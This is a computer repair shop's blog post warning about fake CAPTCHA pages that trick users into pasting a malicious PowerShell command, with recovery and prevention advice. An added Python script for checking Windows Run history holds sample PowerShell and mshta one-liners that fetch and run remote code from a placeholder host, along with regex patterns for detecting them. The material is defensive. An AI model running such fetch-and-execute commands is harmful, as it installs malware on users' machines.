HR Howard Resource Group Gaming · Workstations · Office · Repair · Business IT · Dawsonville, GA
Security

The Fake CAPTCHA Scam That Tricks You Into Running Malware Yourself

There's a scam spreading fast right now — through Google ads, Facebook ads, and fake business profile pages — and it's clever enough that it nearly caught me. I want to describe it in detail so you know what to look for before it gets you.

Here's how it works

You click an ad — maybe it looks like your Google Business Profile, a software download, a government site, or something from a brand you recognize. The page loads and shows you what looks like a standard CAPTCHA: "Verify you are not a robot." Nothing unusual so far.

But this CAPTCHA doesn't have checkboxes or image grids. Instead, it gives you instructions:

  1. Press Windows key + R to open the Run dialog (some versions tell you to open Command Prompt instead).
  2. Press Ctrl + V to paste.
  3. Press Enter.

That's it. "Verification complete." Looks harmless. Except what just happened is this: when the fake page loaded, it silently copied a malicious command to your clipboard. When you pressed Ctrl+V and Enter, you pasted and executed that command yourself. You just installed malware — and Windows let it happen because the command came from you, not from a suspicious file attachment.

Why this works so well

Most people have been trained not to open email attachments from strangers. But this skips the attachment entirely. There's no file to scan, no suspicious download prompt. You're just following what looks like a routine verification step — something you've probably done dozens of times on legitimate sites.

The command being pasted is usually a PowerShell script. PowerShell is a built-in Windows tool designed for system administration. When you run it from the Run dialog, Windows doesn't ask for confirmation the way it does when you double-click an .exe. It just runs. The script typically downloads and installs an infostealer — malware designed to quietly grab your saved passwords, browser cookies, and banking details.

What to do if you did this

If you followed those steps on a page like this, assume your machine is compromised until proven otherwise. The priority order:

  1. Disconnect from the internet — unplug your ethernet cable or turn off Wi-Fi. This stops the malware from sending your data out if it's still in the process of doing so.
  2. Change your passwords from a different device — your phone, a family member's laptop, anything that wasn't connected when you ran the command. Start with email, then banking, then anything else that matters. Do this before reconnecting the infected machine.
  3. Don't log into anything on the affected computer until it's been cleaned. If the infostealer is still running, everything you type could be captured.
  4. Get the machine cleaned — a full malware removal, not just a quick scan. Most standard antivirus tools won't catch everything an infostealer drops.
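To check what was actually pasted, note that Windows records everything typed into the Run dialog in a per-user registry key called RunMRU. The following is an added example, not part of the original post: a small Python triage that flags Run-dialog history entries matching the pattern described above. The indicator list and the sample entries are assumptions constructed for illustration.

```python
import re

# Windows stores each user's Run-dialog history under this registry key.
# Every value's data is the typed command followed by the characters "\1".
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics assumed for this example; not a complete signature set.
INDICATORS = [
    ("script host started from the Run dialog",
     re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.I)),
    ("hidden window requested",
     re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I)),
    ("fetches remote content",
     re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|"
                r"downloadstring|bitsadmin)\b|https?://", re.I)),
    ("executes what it fetched",
     re.compile(r"\b(iex|invoke-expression)\b", re.I)),
]

# Constructed sample values, as they would appear in RunMRU (note the "\1").
SAMPLE_RUNMRU = [
    "notepad\\1",
    "cmd\\1",
    "powershell\\1",                 # an admin opening a shell: one hit only
    "https://example.com/\\1",       # Run dialog can open URLs: one hit only
    "\\\\fileserver\\scans\\1",
    'powershell -w hidden -c "iex (iwr https://verify.example.invalid/c)"\\1',
    "mshta https://verify.example.invalid/check\\1",
]

def clean(value):
    # Remove the two-character suffix Windows appends to each entry.
    return value[:-2] if value.endswith("\\1") else value

def triage(values):
    # Return {command: [reasons]} for entries matching two or more indicators.
    # One hit alone (a bare "powershell" or a bare URL) is normal usage.
    flagged = {}
    for raw in values:
        cmd = clean(raw)
        reasons = [name for name, rx in INDICATORS if rx.search(cmd)]
        if len(reasons) >= 2:
            flagged[cmd] = reasons
    return flagged

if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_RUNMRU).items():
        print(f"SUSPICIOUS: {cmd}\n    " + "; ".join(reasons))
```

On a real machine, the values can be listed with `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"` and fed to `triage`. Commands pasted into Command Prompt instead of the Run dialog are not recorded there, so an empty result does not prove the machine is clean.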

How to spot this scam before you fall for it

The tell is the instruction to open Command Prompt or press Windows + R. No real CAPTCHA, no legitimate website, no real business will ever ask you to do that. CAPTCHAs work in the browser. If a "verification" step requires you to leave the browser and open a system tool, stop immediately — that's the scam.

It also tends to show up on pages that don't quite look right: slightly off fonts, a URL that doesn't match the brand, a page that loads instantly with no real content behind it. But the fake pages are getting better. When in doubt, close the tab.

Who's being targeted

Right now this is showing up heavily in ads targeting small business owners — fake Google Business Profile pages, fake Microsoft account alerts, fake software license renewals. If you're running a business and managing your own online presence, you're in the target range. Share this with anyone in your orbit who might not know what to look for.

We're in Dawsonville

If you or someone you know already ran the command and needs the machine cleaned, call us. We do full malware removal — not just a scan, but manual verification that the system is actually clean. (706) 203-2563 or start a repair request here. Remote service is available if you're not local.
